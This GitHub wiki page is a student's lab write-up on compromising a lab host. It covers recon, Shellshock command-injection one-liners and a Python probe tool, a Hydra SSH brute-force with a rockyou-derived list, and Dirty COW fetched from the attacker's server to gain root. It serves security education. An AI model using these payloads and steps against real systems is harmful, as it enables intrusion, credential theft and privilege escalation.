Lab 4.1: Exploiting Cupcake - squatchulator/Tech-Journal GitHub Wiki
In this lab, I had a lot of trouble getting the remote code execution working properly. The commands had strange syntax that I wasn't familiar with, and a lot of what was slipping me up was just small syntax mistakes. Adam was a huge help in class with diagnosing what exactly in those one-liners was incorrect. Another issue I had was getting hydra to work properly. I wasn't sure if I was using the tool wrong or if the /etc/passwd file on the target system was messed up from another user, but I wasn't able to brute-force using hydra so I just entered each password in the generated list instead (not realistic for bigger applications, but worked for now). I would like to learn more about hydra though, as it's a really interesting tool and I was not aware that tools like this existed.
- sudo nmap 10.0.5.23
- The server has ports 22 and 80 open.
- sudo nmap -A 10.0.5.23
- Port 22 is running OpenSSH 5.3 (Protocol 2.0)
- Port 80 is running Apache httpd 2.2.15 on CentOS (Linux kernel 2.6.x)
- curl http://10.0.5.23
- The landing page links to <a href="../cgi-bin/status">Server Status Report</a>, i.e. a CGI script at /cgi-bin/status, which is the target of the Shellshock requests below.
- First, install nmaptocsv with the following commands:
sudo apt update
sudo apt install python3-pip
sudo pip install nmaptocsv
- Then export the nmap output to CSV. -oG writes nmap's grepable format, which nmaptocsv accepts as input; -Pn skips host discovery, and -sT -sV runs a TCP connect scan with version detection against the top 100 ports:
sudo nmap -sT -sV --top-ports=100 10.0.5.23 -Pn -oG top100.txt
nmaptocsv -i top100.txt -d ","
- Copy the output, paste it into a spreadsheet, and use "Split text to columns" with the comma as the delimiter.
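As an added example (my code, not the lab page's or nmaptocsv's), here is a small parser for the grepable (-oG) file produced by the scan above, turned straight into CSV so the spreadsheet step is not needed. The -oG sample embedded in the script is constructed to look like the lab's top-100 scan, not real captured output.

```python
import csv
import io

# Constructed sample in nmap's grepable (-oG) format, shaped like the lab's
# top-100 scan of 10.0.5.23 (not real captured output).
SAMPLE_GNMAP = """# Nmap 7.94 scan initiated as: nmap -sT -sV --top-ports=100 -Pn -oG top100.txt 10.0.5.23
Host: 10.0.5.23 ()\tStatus: Up
Host: 10.0.5.23 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/\tIgnored State: closed (98)
# Nmap done -- 1 IP address (1 host up) scanned in 9.87 seconds
"""

# Field order inside one "Ports:" entry of a -oG line.
PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc", "version")


def parse_gnmap(text):
    """Return one dict per port found in a -oG file.

    A "Host:" line is split into tab-separated sections; the "Ports:" section
    lists entries as port/state/proto/owner/service/rpc/version separated by
    ", ". nmap rewrites any "/" inside a field value as "|", so splitting on
    "/" is safe. Comment and summary lines are skipped.
    """
    rows = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        sections = line.split("\t")
        host = sections[0].split()[1]  # "Host: 10.0.5.23 ()" -> "10.0.5.23"
        for sec in sections[1:]:
            if not sec.startswith("Ports:"):
                continue
            for entry in sec[len("Ports:"):].strip().split(", "):
                fields = entry.strip().split("/")
                fields = (fields + [""] * len(PORT_FIELDS))[:len(PORT_FIELDS)]
                row = {"host": host}
                row.update(zip(PORT_FIELDS, fields))
                rows.append(row)
    return rows


def to_csv(rows, delimiter=","):
    """Render the parsed rows as CSV text with a header line."""
    cols = ("host",) + PORT_FIELDS
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=cols, delimiter=delimiter, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    # Against the lab you would read top100.txt here instead of the sample.
    print(to_csv(parse_gnmap(SAMPLE_GNMAP)), end="")
```

Run it with a real file by replacing SAMPLE_GNMAP with `open("top100.txt").read()`; the version column is where "Apache httpd 2.2.15 ((CentOS))" ends up, which is the string to search for in the CVE databases.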
Vulnerabilities matching the detected versions:
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2012-4558&scoretype=cvssv3 (Apache 2.2.x: cross-site scripting in the mod_proxy_balancer manager interface)
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2012-4557&scoretype=cvssv3 (Apache 2.2.12 through 2.2.21: mod_proxy_ajp denial of service)
- https://www.exploit-db.com/exploits/34900 (Shellshock, CVE-2014-6271: Apache mod_cgi remote command injection through environment variables handed to bash; this is the one exploited below)
- Confirm the Shellshock RCE with nmap's http-shellshock NSE script. The cmd argument below runs whoami, which shows the account the CGI executes as; to get the target's running kernel version (needed for the privilege-escalation step later) substitute uname -r for whoami.
------------------
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23
- How the curl one-liners below work: Apache copies the User-Agent header into the HTTP_USER_AGENT environment variable of the CGI script, and an unpatched bash (CVE-2014-6271) treats a variable whose value starts with "() { :; };" as a function definition and executes whatever follows it while importing the environment, before the script itself runs. The two echos emit a blank line first, so Apache sees an empty CGI header block and returns the command output as the response body; without them the output is parsed as headers and Apache answers with a 500 ("malformed header from script" in the error log). The "bash -s :''" that trailed some of the original one-liners was a leftover from a copied example: curl treats those words as extra URLs, fails on them, and still fetches the real one, so it is dropped here.
- Show OS release
------------------
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/redhat-release' http://10.0.5.23/cgi-bin/status
- Show contents of /etc/passwd (saved to users.txt for the brute-force step)
------------------
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.0.5.23/cgi-bin/status --output - >> users.txt
- Show code behind the status CGI (the relative path works because mod_cgi runs the script from its own directory)
------------------
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat ../cgi-bin/status' http://10.0.5.23/cgi-bin/status
- Show results of running ifconfig
------------------
curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' http://10.0.5.23/cgi-bin/status
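As an added example (my code, not part of the lab page or of the exploit-db entry), here is the same Shellshock probe in Python with the two pieces the one-liners depend on made explicit: the "() { :; };" prefix and the leading blank line. It also includes the classic local check of a bash binary. The host, port and path are assumptions taken from the lab target, the HTTP response in the test is constructed, and probe() is the only function that needs a live target.

```python
import shutil
import socket
import subprocess

# What a vulnerable bash sees in HTTP_USER_AGENT: an empty function body, then
# trailing commands it executes while importing the environment. The two echos
# print the blank line that terminates the (empty) CGI header block.
PREFIX = "() { :; }; echo ; echo ; "


def shellshock_user_agent(cmd):
    """Header value that an unpatched bash executes when the CGI imports HTTP_USER_AGENT."""
    return PREFIX + cmd


def build_request(host, path, cmd):
    """Raw HTTP/1.1 GET carrying the payload in User-Agent (mod_cgi exports it unchanged)."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"User-Agent: {shellshock_user_agent(cmd)}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def extract_injected_output(raw_response):
    """Pull the injected command's output out of the HTTP response.

    The command runs before the CGI script's own code, so its output is the
    first thing in the body; the script's real "Content-type:" header then
    follows as plain text. Everything before that line came from our command.
    """
    head, sep, body = raw_response.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no HTTP header terminator in response")
    status = head.split(b"\r\n", 1)[0].decode(errors="replace")
    if " 200 " not in status:
        # A 500 here usually means the blank-line trick failed or bash is patched.
        raise RuntimeError(f"unexpected status line: {status}")
    text = body.decode(errors="replace")
    cut = text.lower().find("content-type:")
    return text[:cut] if cut != -1 else text


def probe(host, path, cmd, port=80, timeout=10.0):
    """Send the crafted request to a target and return the injected command's output."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host, path, cmd))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return extract_injected_output(b"".join(chunks))


def local_bash_is_vulnerable(bash="bash"):
    """The classic env-var test. Returns True/False, or None if no bash binary is found."""
    path = shutil.which(bash)
    if path is None:
        return None
    env = {"x": "() { :; }; echo VULNERABLE", "PATH": "/usr/bin:/bin"}
    res = subprocess.run([path, "-c", "echo test"], env=env, capture_output=True, text=True)
    return "VULNERABLE" in res.stdout


if __name__ == "__main__":
    print("local bash vulnerable:", local_bash_is_vulnerable())
    # Against the lab target (assumed values) this returns the CGI's user, e.g. "apache":
    # print(probe("10.0.5.23", "/cgi-bin/status", "/usr/bin/whoami"))
```

If extract_injected_output() raises on a 500, check the Apache error log on the target for "malformed header from script": that is the symptom of leaving the two echos out.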
Build a candidate password list for samwise from rockyou (Kali ships it gzip-compressed, so decompress on the fly and keep only the lines that contain the username):
zcat /usr/share/wordlists/rockyou.txt.gz | grep -i samwise >> passwords.txt
Now run Hydra against that user with the list. Note the capital -P: lowercase -p means a single literal password, so "-p passwords.txt" would try the string passwords.txt once and never open the file, while -P reads one password per line from it. -t 4 is the parallelism Hydra's own documentation recommends for ssh:
hydra -l samwise -P passwords.txt 10.0.5.23 -t 4 ssh
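As an added example (my code, not the lab page's), the script below ties the /etc/passwd dump from the Shellshock step to the wordlist and Hydra step: it parses the dump into accounts, keeps the ones with a real login shell, builds a per-user candidate list the way the grep over rockyou does (widened to the GECOS name parts), and emits the Hydra argv with -P rather than -p. The passwd text and mini wordlist are constructed so it runs offline; on the lab you would read users.txt and the decompressed rockyou.txt instead.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: a Shellshock dump of /etc/passwd as it lands in users.txt,
# with the CGI's own header line trailing the file (not real target output).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
samwise:x:500:500:Samwise Gamgee:/home/samwise:/bin/bash
Content-type: text/html
"""

# Constructed stand-in for rockyou.txt lines.
SAMPLE_WORDLIST = ["123456", "samwise", "Samwise1", "gamgee", "frodo",
                   "SAMWISEGAMGEE", "samwise", "password"]

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
                  "/bin/sync", "/sbin/halt", "/sbin/shutdown"}


@dataclass
class Account:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) lines, tolerating junk (such as CGI headers) around the real file."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            continue
        name, _pw, uid, gid, gecos, home, shell = parts
        accounts.append(Account(name, int(uid), int(gid), gecos, home, shell))
    return accounts


def interactive_users(accounts, min_uid=500):
    """Accounts worth brute-forcing over SSH: a real shell and a non-system UID (root kept).

    CentOS 6 starts ordinary users at UID 500; newer distros use 1000, hence the parameter.
    """
    return [a.name for a in accounts
            if a.shell not in NOLOGIN_SHELLS and (a.uid >= min_uid or a.uid == 0)]


def gecos_terms(account):
    """Name parts from the GECOS field, e.g. 'Samwise Gamgee' -> ['Samwise', 'Gamgee']."""
    return [t for t in re.split(r"[ ,]+", account.gecos.strip()) if t]


def candidate_passwords(username, wordlist, extra_terms=()):
    """Case-insensitive substring filter like `zcat rockyou.txt.gz | grep -i samwise`,
    widened to extra terms and de-duplicated while keeping wordlist order."""
    terms = {username.lower(), *(t.lower() for t in extra_terms if t)}
    seen, out = set(), []
    for word in wordlist:
        w = word.rstrip("\n")
        if not w:
            continue
        low = w.lower()
        if any(t in low for t in terms) and w not in seen:
            seen.add(w)
            out.append(w)
    return out


def hydra_command(user, wordlist_path, host, tasks=4):
    """argv for Hydra. Capital -P reads passwords from a file; lowercase -p would use
    the file name itself as the single password to try."""
    return ["hydra", "-l", user, "-P", wordlist_path, host, "-t", str(tasks), "ssh"]


if __name__ == "__main__":
    accounts = parse_passwd(SAMPLE_PASSWD)
    targets = interactive_users(accounts)
    print("interactive users:", targets)
    for a in accounts:
        if a.name in targets:
            cands = candidate_passwords(a.name, SAMPLE_WORDLIST, gecos_terms(a))
            print(a.name, "->", cands)
            print(" ".join(hydra_command(a.name, f"{a.name}-passwords.txt", "10.0.5.23")))
```

The output of candidate_passwords() is what goes into the file handed to -P; writing it per user keeps each Hydra run small, which matters at -t 4 against SSH.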
- On Kali, pull a local copy of Exploit-DB 40839 (Dirty COW, CVE-2016-5195: a race in the kernel's copy-on-write handling that lets an unprivileged user write to read-only files such as /etc/passwd):
searchsploit -m 40839
- Spawn a temporary web server in the directory that now holds 40839.c (any free port works):
python3 -m http.server 9191
- On the target, make a new working directory and fetch the source. The URL has to name the file; requesting the bare root only returns the directory listing:
wget http://<attacking ip>:9191/40839.c
- Compile the exploit on the target (it needs gcc there; otherwise build it on a machine with a matching libc and transfer the binary the same way):
gcc 40839.c -o cow -lpthread -lcrypt
- Run it and enter a new password when prompted. 40839 backs up the original /etc/passwd to /tmp/passwd.bak and then overwrites the root entry with a user named firefart carrying the chosen password, so su firefart afterwards gives a root shell:
./cow
- To reset the machine, put the original password file back:
mv /tmp/passwd.bak /etc/passwd
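Before staging 40839.c it is worth checking whether the kernel is actually still exposed, which is what the "kernel version" step in the Shellshock section is for (run /bin/uname -r through the same curl one-liner). As an added example (my code, not the lab page's), the script below parses RHEL/CentOS-style release strings and compares the build number against the first fixed build. The first-fixed builds in FIRST_FIXED are my reading of the vendor advisories (RHSA-2016:2105 for EL6, RHSA-2016:2098 for EL7) and are an assumption to verify against the advisory text, not something the lab page states.

```python
import re

# First kernel build that carries the CVE-2016-5195 fix, per EL major release.
# ASSUMPTION: taken from memory of RHSA-2016:2105 (EL6) and RHSA-2016:2098 (EL7);
# check the advisory before relying on it.
FIRST_FIXED = {
    "el6": "2.6.32-642.6.2",
    "el7": "3.10.0-327.36.3",
}

_RELEASE_RE = re.compile(r"^(\d+(?:\.\d+)*)-(\d+(?:\.\d+)*)\.(el\d+)")


def parse_kernel_release(release):
    """'2.6.32-573.el6.x86_64' -> ((2, 6, 32), (573,), 'el6').

    Version and build become integer tuples so that 642.6.2 > 642.6.1 > 573
    compares the way RPM build numbers are meant to.
    """
    m = _RELEASE_RE.match(release.strip())
    if not m:
        raise ValueError(f"not an EL-style kernel release: {release!r}")
    version = tuple(int(x) for x in m.group(1).split("."))
    build = tuple(int(x) for x in m.group(2).split("."))
    return version, build, m.group(3)


def is_dirtycow_vulnerable(release):
    """True if the build predates the first fixed build for its EL release."""
    version, build, dist = parse_kernel_release(release)
    if dist not in FIRST_FIXED:
        raise ValueError(f"no first-fixed build recorded for {dist}")
    fixed_version, fixed_build, _ = parse_kernel_release(f"{FIRST_FIXED[dist]}.{dist}")
    if version != fixed_version:
        # EL keeps one upstream base per major release; a different base means the
        # table does not apply (e.g. a third-party kernel), so refuse to guess.
        raise ValueError(f"{release!r} is not on the expected {dist} base")
    return build < fixed_build


def triage(release):
    """One-line verdict for a uname -r string."""
    try:
        verdict = "vulnerable" if is_dirtycow_vulnerable(release) else "patched"
    except ValueError as exc:
        verdict = f"unknown ({exc})"
    return f"{release}: {verdict}"


if __name__ == "__main__":
    # Constructed inputs; the first is the shape of a CentOS 6 lab kernel.
    for r in ("2.6.32-573.el6.x86_64", "2.6.32-642.6.2.el6.x86_64", "4.4.0-45-generic"):
        print(triage(r))
```

A "patched" verdict means 40839 will fail or crash the race loop without gaining anything, so it saves staging the compiler and source on the target for nothing; "unknown" means the table does not cover that distribution and the vendor's own advisory has to be checked.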
active-recon.sh
#!/bin/bash
# Usage: ./active-recon.sh <ip> <dnsserver>
# Appends reverse DNS, an aggressive nmap scan and the web root of <ip> to recon.txt.
if [ "$#" -ne 2 ]; then
    echo "Incorrect parameter usage. Usage: $0 <ip> <dnsserver>"
    exit 1
fi
ip="$1"
dnsserver="$2"
echo "Working..."
echo "DNS Resolution for $ip" >> recon.txt
nslookup "$ip" "$dnsserver" | grep name >> recon.txt
# scan the host passed as the first argument, not a fixed address
sudo nmap -A "$ip" >> recon.txt
curl "http://$ip" >> recon.txt
dns-resolver.ps1
# Script help from: https://red-gate.com/simple-talk/sysadmin/powershell/how-to-use-parameters-in-powershell/
# Usage: .\dns-resolver.ps1 <first three octets, e.g. 10.0.5> <dns server>
# Reverse-resolves every host address in the /24 against the given server and
# prints the ones that have a PTR record.
$pref = $args[0]
$server = $args[1]
$table = @()
# .0 is the network address and .255 the broadcast, so only 1-254 are hosts
for ($i = 1; $i -le 254; $i++) {
    $ipaddr = "$pref.$i"
    # -DnsOnly (no space after the dash) skips the LLMNR/NetBIOS fallbacks so
    # only the named DNS server is queried
    $result = Resolve-DnsName -DnsOnly $ipaddr -Server $server -ErrorAction Ignore
    if ($result) {
        $ipTable = New-Object PSObject -Property @{
            IPAddress = $ipaddr
            NameHost  = $result.NameHost
        }
        $table += $ipTable
    }
}
$table | Select-Object IPAddress, NameHost | Format-Table -AutoSize